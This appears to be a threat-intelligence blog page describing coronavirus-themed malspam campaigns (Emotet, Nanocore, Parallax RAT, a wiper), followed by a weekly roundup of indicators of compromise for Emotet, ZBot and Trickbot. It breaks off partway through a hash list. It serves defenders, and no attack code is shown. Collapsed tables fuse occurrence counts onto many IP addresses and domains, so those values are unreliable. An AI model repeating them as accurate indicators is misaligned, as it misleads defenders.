                How did it work? The majority of these campaigns were driven through email and malspam specifically. These actors would send coronavirus themed emails to potential victims and, in some cases, use filenames related to coronavirus as well, enticing victims to click attachments. One of the reasons this was so effective was the large amount of legitimate email related to coronavirus that also included attachments.

                So What?
                • Organizations need to realize that attackers are going to use current events to try and get victims to open attachments or click links. You should be prepared and vigilant in identifying these emails and ensuring they don't make it to your users inboxes.
                • There is a wide variety of threats represented here so there isn't one single threat to be concerned with, just realize there will likely be a lot more.
                • It's not just malicious content, there are a lot of weird executables and other files floating around that are coronavirus-themed and are unwanted, albeit not inherently malicious.

                Malspam campaigns

                During our analysis of email telemetry, we identified several malicious spam campaigns leveraging news related to coronavirus to entice potential victims to open attachments and initiate various malware infections. Several malware families are currently being distributed via these malspam campaigns including Emotet, Nanocore RAT, and various trojans.

                Emotet

                Emotet is one of the most prevalent malware families being actively distributed. We have previously analyzed this threat in various posts, notably here and here. Emotet distribution campaigns are commonly observed attempting to integrate current news topics of interest in their distribution campaigns and the current interest in CoronaVirus is no different. It has been previously reported that Emotet has been making use of this theme in various email distribution campaigns, which we have also observed. As previously described, these emails typically contain malicious Microsoft Word documents that function as downloaders for the Emotet malware.

                An example of one of the malicious Word documents is below. As usual with these sort of attachments, users are prompted to Enable Editing and Enable Content, granting the attacker the ability to execute code on the endpoint to facilitate the delivery and execution of Emotet, thus infecting the system.

                Over the course of the past few weeks, we have observed large quantities of messages featuring this and similar themes being used to spread Emotet to victims.

                Nanocore RAT

                It is important to note that Emotet is not the only malware family currently being distributed using coronavirus-themed malspam campaigns. We have also observed Nanocore RAT being distributed using similar types of email-based malware distribution campaigns. Nanocore RAT is a remote access trojan (RAT) that is commonly distributed by various threat actors. RATs are one of the more common threats we see delivered on the threat landscape. These malware families typically provide the attacker with remote access into the system and the ability to grab things like keystrokes, files, webcam feeds, and download and execute files. During our investigation we did find a campaign delivering Nanocore, one of these RATs. The campaign was a notification to customers around the status of the coronavirus and the steps they are taking as an organization, as is shown below.
                As you can see, the email came with a ZIP file attached, which contained a PIF executable. Once the victim executed the file, Nanocore RAT was installed on the system, giving the adversaries remote access.

                Other campaigns

                We did find at least one other campaign that was ongoing, but at the time of discovery the command and control (C2) servers were down and final payload retrieval wasn't possible, but the malicious intent was clear. This started like many of the other campaigns with a coronavirus theme.

                This particular email was notifying customers of a delay in shipping due to coronavirus and attached a .pdf.ace invoice file. Inside the compressed archive was an executable purporting to be a signed order confirmation. Upon execution, additional data was attempted to be retrieved but due to the server being down, it is not possible to identify the final payload as of the time of publishing.

                Additional malware campaigns


                In addition to email campaigns leveraging coronavirus, we also analyzed various open-source malware repositories in an attempt to identify additional malware making use of the disease. We discovered several examples of malware that had been submitted to the repositories including adware, wipers, and other various trojans.

                Parallax RAT

                During our open-source investigation, we came across a sample aptly named "new infected CORONAVIRUS sky 03.02.2020.pif." This file was likely delivered as an attachment to an email in some sort of compressed archive. Upon execution, the RAT is installed and persistence is achieved by creating links in the user's startup folder, as well as the creation of several scheduled tasks, and establishing command and control communications with a dynamic DNS provider domain, which is fairly common with RAT distribution.

                Parallax is another RAT not much different from the nanocore campaign we found above. It has the same basic functionality and allows the attacker the ability to upload and download files as well as grab things like keystrokes and screen captures.

                Other samples found

                During the course of the investigation, we came across several samples that appeared to be malicious and were tagged as malicious in various engines but were, in fact, odd jokes or non-malicious content, including a fake wiper. This file was found with the suspicious filename of "CoronaVirus.exe" of which there were many. This particular one immediately appeared to lock the screen upon execution.
                The rough translation of the text displayed to the user is "Deleting all files and folders on this computer - Coronavirus." Upon completion of the counter, the button at the bottom became clickable, and when clicked, displayed the following message:

                This says it is a joke and the user can press Alt + F12 to exit. If the user pushes these buttons, it drops you back at the desktop. Upon further analysis, it does not appear there were any other malicious actions taken. This is just one of several odd examples found in our research including another joke game written in VBS and an odd executable wrapper of a well-known outbreak map for coronavirus. None of these files were malicious but did take actions that could be viewed as malicious, as such, we have seen many antivirus vendors detect these as malicious executables. At the very least, they are unwanted applications, albeit not inherently malicious.

                One additional malware sample we discovered was a wiper designed to destroy infected systems. It was initially submitted to various malware repositories with the filename "冠状病毒.exe" which translates to "coronavirus." The malware, when executed on systems, uses several techniques to delete data from both the file system and registry in an attempt to disrupt system operations. For example, we observed the malware invoking the Windows Command Processor and using the "rd" Windows command to iterate through the directory structure of the C:\, deleting the contents:

                It is important to note that there is no prior attempt to copy, exfiltrate, or save a copy of the contents and the malware does not appear to make any attempt to extort victims or otherwise generate revenue for the malware author.

                Conclusion


                Malicious actors are always going to do whatever they can to increase infection rates and in turn increase revenue, this includes using the news and fear to achieve their goals. This is one of the cases where both news and fear can be used. In a world where threats like Emotet are stealing emails and replying in-line users need to be increasingly skeptical of all attachments regardless of source. These attacks can be seen in an email thread with a colleague or friend and, in some cases, may come directly from that colleague or friend. Additionally, anything news related should be treated with a little extra skepticism, go out and do your own research instead of just clicking links and opening documents that are sent your way.

                Coverage


                Ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.


                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.

                Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Indicators of Compromise (IOC)

                Hashes (SHA256)

                345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9 (Parallax RAT)
                Adde95e8813ca27d88923bd091ca2166553a7b904173ef7a2c04bb3ddf8b14a9 (Wiper)
                C57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46 (Nanocore)

                Emotet Maldocs (SHA256)

                006dc4ebf2c47becdc58491162728990147717a0d9dd76fefa9b7eb83937c60b
                0a84308348fee6bbfe64a9ef23bb9c32cb319bcdf5cf78ddfda4a83dadea4b8e
                0a8aa3f413a8989bb89599dfc2404f7d34dfbb2e3ce26e900d228e9e8c8908b8
                0fdc97da1c297e6fef93910008fc5c47cbdcd3e2987bc163467b34f56de112ff
                11b4519b76957b0758381f8e19c5e15d8744f7974716642aeb586c615dde38fa
                140da6b610a45f84c6438207ab11942d79eb37831551810f87baae80cfff4593
                1c3532d143212078e204d0f81a782deacd58e8f0e7253472e0509491fd1e5201
                1e4b01e3e146ff01a3782b01680a5165432af556331d599ec6ad35b4983b216f
                2037c7cc809ed3eddd1338d2bec6266cdb449dbf8ff3510fd360a08d229d4f40
                21182b7834a7e13033be7b370a68b3d3639f4cae12fe80e2a908404cbd4cd324
                2437ef90b60cf3d6bd0c3eebf3f41ed1e403bc31b024b52b0f41ec648d80a583
                257afe9f4d7b282b1c0b2f3ebb7e1e80e96c8e0214f1b80ea2b7b636a4e7747d
                2bcd35bfb7e4dbdbbf64fce5011199947794425093be7bc74829bfeadb89f0a3
                2c9c1e04d806ad8890dd6bf4477efb4ea6c78b8185a9996876bcaea568a04e70
                2e47f37bef4dea338e366ce30fe54888e5aaa2d47a5c0db4a3c3e9e5c25f8ace
                2f3ee4688a31c8d249b8426f46e392d9c55b85bfad9fb31fb362eb32d38bd9b3
                31cb82cd750af6af9ecf369fd26d47dc913f6b56be6ea12b10fe6dd90ef1b5df
                32753598f94412fe3dc382dc12dcf2edf7881d9f07814c82aeec36481b9362b5
                3386dc7dc67edd5e84244376b6067e3767e914a1cc1fc7fd790a6aa68750a824
                37354a04f6d423809602e198e590469173cc8e930cc7fdd4da2c2072977251e9
                3981d933de93f55641fdf8cfe980e40a0bf52ce8b022735e8ebc4f08cbb19104
                39c17475bdb019010453085830e7f8aa1ef41ca182982491306fcf75166b8e08
                3a7a8518b41dd6c05289a08974c95a0038be4e5d1b0588edfd0589fcf22b0c8f
                3cd099efe4cb426fdc6276380c224b5478d0841c5c44d2c0a088d039d529d258
                3fc33b537fb38e1f586ddb3ebbbe152458dcde336c2f26da81d756e290b5ef00
                46f81af256c630969f55554ea832037bc64df4374ec0f06ac83a1c4b89869314
                49cfa1b3cbe2bf97079c0dd0a9f604e3f2e7d9fbb6d41128a9889e068aa884f6
                4a272dd4a5c6261e983d667dd676875054dd4a4ea11620f16c553fcfd2c44861
                501cc107e410b245d1b95b64ae0afdae758375b4b3724acfda44041bad963232
                50a3bea4b9686bcf5cac144d4fc18aa178f66c8368205f9065cd1d9a2c41f026
                51f0e9b151bde97ebeb813d6eed8a11f02551a6530049f53dc29fc1a20b6699d
                587840d28f2585dd5207731d7fda86a0966c82fa592a26f9148b2de45526db55
                5b7db5046ba22a6242d5ff6e8f538ad43bba53810117d5eb8f023215aad26e6b
                5e20a0ab563950eab76c023101b1dd374becac2a5149a74320b23b59a7f16256
                698eb726345c71eca7b4a531bfa76ab6e86ef100f943a727fb5866a84ec79289
                6c34cca35d98e464c2f74abd9be670c7f8f707f37cd3f0fd4746c49f8fcf6b07
                722a60dfd59a595daa487f2fb759ef6f9ccaabcdf20605d5ae9450cba4a9b9b2
                78cf7ea3c1da98941e164f4ac3f75b57e9bce11467bc5a6c6877846f1adcf150
                7a97fc7bdd0ad4ef4453c2e52dd8f44dee9b4e91ff3b5518e311ef1ebac3b667
                7a9f249978c959e1f11f2992a8ce4a70ba333c8dbdc2638c780bbbe62de4808e
                7cbcad4d6e9ad8438e5febd3830bff9aef4729b98d23935ad7f9e6d290272732
                7cf8f24d7e8b1e2f63bfa7a18cd420a03fff44126e80aed8cb90fba3c4e986ac
                80ee20c604d5d4b51a30dc21da271651f3c085c40281e3ff3e2ee0175d2ca98d
                80f8877406e899c6274331aa991b8d1f4f087e3233c36d39fbaebb729c294899
                89a0147dec8d6838f14815b577ae41dbcf54953c66e7f5f999ab91fea6ec08fa
                8a724fc60bde738694779751d6c63a7ed1caa03518b8f26b9acb36d5c1b29930
                8c0a8d6876a6c7fe44962883561d9f48615ee67f4544872ec98f47edcf516509
                8f91d27d3a59c08ab4c453b2679f4620696ba67c56280a4c3757368acb20aad3
                90c3d8d13ea151bce21a1f4b842d0ed4eaff09842b23311b2326cf63957fc2b2
                92af9c8c539ff9f99f79cce8453b1c483d117c095e2e0ffe384d96e35f72dc8b
                9367f3ea7460ae40ca69d41398327f97136a93656ef5fad1285a0b82f81522a4
                980de93ad93ecaabc048c9fcc9d62e43eeb32f216c4177963cf1bd94ad53074b
                9d58ca5383fef5dc837ca9d4251d247bed4ead4a6b90a9aae30568be80e20543
                9e4cb963e509fbde6de003a81a3e19cfc703be1c41d20f4b094a0fa89d6ad02c
                9f27a826b4b873c9ea23e023f54d5291a50004d67dd5fe64d1f8c8e8b51b74e3
                a080d763c60efd4ef2781ad3090c997d1092ac726707366d92d647f26ee2965f
                a286e3be694b9525530ec6a65b71a8a91e04042c3471e8a9e440f503fe8ce995
                a537c75de9a95be0c071fd6437cbaf3696752f02c3cd5afa1c9cc47c4c755f75
                aa6ceb17ced471e1695c99c0718bc24c710311f0daa256cb0783d82218d772c9
                ac416780fa4aa340fff2787e630351c5813faceb823424817eb10e82254b785d
                b04584ee8b3ba565541cb0f4d8787ed6e8942b6bdec5b1acdc03488b93aeb3cb
                b14d70827d5d668aeb31e94be512fea9fb38ead8ec12cdf7617616801c76b6e9
                b283e4f841e328f0cc12ebdf76aafb819ebadba7df863681994b69697731cf96
                b34f4ec4ae8d66b030f547efe3acc2a71c9ab564f78aac68719ec91dab613bb3
                ba4297978b6a6b5fe2b66c32ead47bbd1f2e2f549beed5cd727eb9ae3fed6b6a
                bdcef0f16c70086414ff95b69fdbbe7eb0c9814308d3d60143b6c04dfc077257
                bf178911f2c063c9592020652dc22076d02ca87d14a7ed7862074d334470ae32
                c135f36d3346699e6d2bf9f5f5f638fd9475c0b12144a15a0652b8f1ebb25c12
                c6dc408d60c2354a13e835bf826300a6d5258b72b8826e8c46d946cbc1f0b455
                c9d3c250ab6d8535b7a4114a1e9545f0b9bc24e4e277640c59b7555f38727885
                cba1c3070f76e1a2705afee16bd987b6a8ffa45900cab8cf3b307f60a7b89ac9
                cc2507ddd53a6f00265f3be51d7217def786914bd1d700ec3c74a2a7107b3476
                d765980228492758a11e534e45924311aef681cb5859f701cd457b6b871c2d06
                d8183919d675978d58cd1f134768f88adeea9ce53b167c917e54fff855c6d9f9
                da87521ecc146a92a7460a81ebb5ca286450f94c8c9af2a4b3c6c8a180d421c5
                dbcef5c217a027b8e29b1b750c42a066650820a129543f19364bcb64ac83bc07
                dc66811ce189240c510733be9e1a2175079dddb80ebf02faaa044fce1f7134d0
                e17dca7c2c05139fc81302e76e0e9aaa29368b60cb147208cbcb5c8df113f6f6
                e250d977e47e7809086dd35a2767f9ef557591dd00e9ce96ef4071e4f0d8c670
                e32cca6446f2ddd8430400b16fc171ab3163cf8222669d7d9144e9c85904d5f5
                e382ee1ce9d99f4e8e18833bac121c14ee2e5dc29a8b5382ca5b4eda9db7f1aa
                e55efa92d87484cf6b251f2302a0c0c7650acd7ea658bf9997bf761b64fe472a
                e8221acccdb8381b5da25a1f61f49dda86b861b52fafe54629396ed1e3346282
                ea3a0a223474592635d1fb7a0731dd28a96381ad2562e3e064f70e2d4830c39d
                eab14b1bfa737644f14f7bb7ace007d418230285364e168e35bd718a6517b316
                f2a2bea86ce1a4803345b4aa46824c25d383a0b40b10bb69e528c72305552a2a
                f6879431b901df789082452c1c4ffa29e857d247886e421df6dda5fb3d81ca5e
                f7209d1099c75acccbef29450271d821fd78ad52176f07aa8a93a9e61e9eaa7f

                Domains

                vahlallha[.]duckdns[.]org


                Threat Roundup for February 7 to February 14

                $
                0
                0
                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
                The most prevalent threats highlighted in this roundup are:

                Threat NameTypeDescription
                Doc.Downloader.Emotet-7580217-0 Downloader Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
                Win.Packed.ZBot-7578445-1 Packed Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
                Win.Dropper.Trickbot-7582953-1 Dropper Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
                Win.Dropper.NetWire-7578556-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
                Win.Packed.Gamarue-7580018-0 Packed Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud.
                Win.Trojan.Kovter-7581113-1 Trojan Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
                PUA.Win.Trojan.Bladabindi-7581164-0 Trojan njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone.
                Win.Packed.Ponystealer-7581286-0 Packed Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT).
                Win.Ransomware.Cerber-7582361-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.

                Threat Breakdown

                Doc.Downloader.Emotet-7580217-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                Value Name: Blob
                20
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Type
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Start
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ErrorControl
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ImagePath
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: DisplayName
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: WOW64
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ObjectName
                5
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Description
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
                Value Name: c019706b
                2
                MutexesOccurrences
                Global\I98B68E3C18
                Global\M98B68E3C18
                Global\IC019706B2
                Global\MC019706B2
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                67[.]195[.]228[.]953
                157[.]7[.]107[.]44
                190[.]228[.]29[.]1153
                208[.]84[.]244[.]494
                105[.]187[.]200[.]2404
                23[.]227[.]38[.]323
                72[.]18[.]130[.]1693
                69[.]175[.]10[.]343
                83[.]143[.]28[.]1304
                5[.]2[.]81[.]1713
                41[.]191[.]232[.]224
                23[.]21[.]177[.]743
                89[.]97[.]236[.]1713
                190[.]196[.]217[.]503
                195[.]57[.]58[.]704
                206[.]183[.]111[.]623
                192[.]185[.]181[.]1684
                77[.]88[.]21[.]1584
                87[.]250[.]255[.]2123
                46[.]28[.]106[.]93
                77[.]88[.]21[.]373
                83[.]143[.]24[.]504
                86[.]96[.]229[.]28/313
                74[.]208[.]5[.]14/313
                173[.]194[.]204[.]108/314
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                smtp[.]outlook[.]com3
                mail[.]outlook[.]com3
                smtp[.]secureserver[.]net4
                mailv[.]emirates[.]net[.]ae3
                pop-mail[.]outlook[.]com3
                pop[.]secureserver[.]net3
                mail[.]secureserver[.]net3
                secure[.]emailsrvr[.]com3
                pop[.]yandex[.]com[.]tr3
                smtp-mail[.]outlook[.]com3
                outlook[.]office365[.]com3
                mail[.]telkomsa[.]net4
                smtp[.]yandex[.]com[.]tr4
                mail[.]yandex[.]com3
                mail[.]municipiodeyaguachi[.]gob[.]ec3
                pop[.]vbn[.]co[.]bw4
                mail[.]in[.]cpm-int[.]com3
                mail[.]siajewellery[.]com3
                mail[.]firstgourmet[.]com3
                mail[.]lolipop[.]jp3
                pop3[.]lolipop[.]jp3
                mail[.]doves[.]co[.]za3
                mail[.]vbn[.]co[.]bw4
                smtp[.]vbn[.]co[.]bw3
                mail[.]domverconsultants[.]com3
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                %HOMEPATH%\298.exe20
                %SystemRoot%\SysWOW64\AppIdPolicyEngineApi1
                %SystemRoot%\SysWOW64\msctf1
                %SystemRoot%\SysWOW64\cipher1
                %SystemRoot%\SysWOW64\msftedit1
                %SystemRoot%\SysWOW64\iprtrmgr1
                %SystemRoot%\SysWOW64\xpsservices1
                %SystemRoot%\SysWOW64\uexfat1
                %ProgramData%\UmCbkT.exe1
                %SystemRoot%\SysWOW64\dhcpcmonitor1
                %SystemRoot%\SysWOW64\psbase1
                %SystemRoot%\SysWOW64\f3ahvoas1
                %SystemRoot%\SysWOW64\XpsRasterService1
                %SystemRoot%\SysWOW64\NlsData04141
                %SystemRoot%\SysWOW64\rnr201
                %SystemRoot%\SysWOW64\KBDIULAT1
                %SystemRoot%\SysWOW64\KBDHE1
                %TEMP%\1A19.tmp1
                %SystemRoot%\SysWOW64\dhcpcore1
                %TEMP%\2D63.tmp1
                %SystemRoot%\SysWOW64\mydocs1
                %SystemRoot%\SysWOW64\wininet1
                %SystemRoot%\SysWOW64\twinui1
                %SystemRoot%\SysWOW64\ureg1

                File Hashes

                0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38 006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb 00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19 012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66 024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5 02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07 05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2 06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1 0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b 0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6 0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f 15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1 18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a 18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6 18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4 196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f 19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451 1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1 21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d 2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368 26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e 294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52 31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73 37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99 380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella


                Malware




                Win.Packed.ZBot-7578445-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
                Value Name: LoadAppInit_DLLs
                25
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
                Value Name: AppInit_DLLs
                25
                Files and or directories createdOccurrences
                %HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll21
                %HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe21
                %SystemRoot%\Tasks\kylaxsk.job21
                %System32%\Tasks\aybbmte25
                %ProgramData%\Mozilla\thfirxd.exe25
                %ProgramData%\Mozilla\lygbwac.dll25

                File Hashes

                083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8 0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6 156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5 172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25 1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827 27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06 3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679 3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36 41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620 4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c 59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b 5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73 5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5 633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5 67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838 79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c 7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1 7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b 834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b 84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317 87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e 8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5 8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44 94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                ThreatGrid




                Win.Dropper.Trickbot-7582953-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                Value Name: Blob
                3
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
                Value Name: Blob
                1
                MutexesOccurrences
                Global\316D1C7871E1029
                Global\785161C88721025
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                216[.]239[.]32[.]211
                216[.]239[.]34[.]213
                216[.]239[.]36[.]212
                216[.]239[.]38[.]211
                104[.]20[.]17[.]2421
                116[.]203[.]16[.]954
                50[.]19[.]116[.]1221
                69[.]195[.]159[.]1581
                190[.]214[.]13[.]214
                181[.]112[.]157[.]421
                181[.]113[.]28[.]1461
                181[.]140[.]173[.]18616
                119[.]252[.]165[.]751
                45[.]125[.]1[.]342
                54[.]235[.]203[.]71
                23[.]21[.]50[.]371
                198[.]8[.]91[.]103
                121[.]100[.]19[.]181
                171[.]100[.]142[.]2381
                82[.]146[.]62[.]522
                5[.]182[.]210[.]2462
                5[.]182[.]210[.]2263
                51[.]89[.]115[.]1165
                85[.]204[.]116[.]2376
                93[.]189[.]42[.]1467
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                www[.]myexternalip[.]com1
                myexternalip[.]com3
                icanhazip[.]com1
                ip[.]anysrc[.]net4
                api[.]ip[.]sb2
                ipecho[.]net2
                wtfismyip[.]com1
                api[.]ipify[.]org3
                ipinfo[.]io2
                252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org9
                Files and or directories createdOccurrences
                %APPDATA%\windirect29
                %APPDATA%\windirect\settings.ini29
                %APPDATA%\windirect\data29
                %System32%\Tasks\Windows Direct core tools29
                %SystemRoot%\Tasks\Windows Direct core tools.job25
                %APPDATA%\windirect\bc434c1a3bd87c0cb40c31a3caac7831.exe1
                %APPDATA%\windirect\7a2bd7d2423c2c83b3bc987c22da348c.exe1
                %APPDATA%\windirect\a073a92c82bdad2dbdcba4bd1b322bdc.exe1
                %APPDATA%\windirect\7baba02278378b0d739b212389d20c2c.exe1
                %APPDATA%\WINDIRECT\<original file name>.exe25

                File Hashes

